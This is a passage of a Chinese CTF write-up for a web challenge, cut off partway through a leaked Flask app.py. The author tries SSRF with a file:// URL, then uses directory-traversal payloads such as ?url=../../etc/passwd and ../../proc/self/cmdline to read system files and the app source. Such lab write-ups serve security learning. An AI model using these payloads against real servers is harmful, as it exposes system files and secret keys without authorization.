前言
这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。
wp
首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包
有个url的GET参数,我们尝试SSRF
url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越
?url=../../etc/passwd
说明存在文件包含,目录穿越可以实现
我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录
?url=../../proc/self/cmdline
然后直接爆出app.py的源码
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route('/page')
def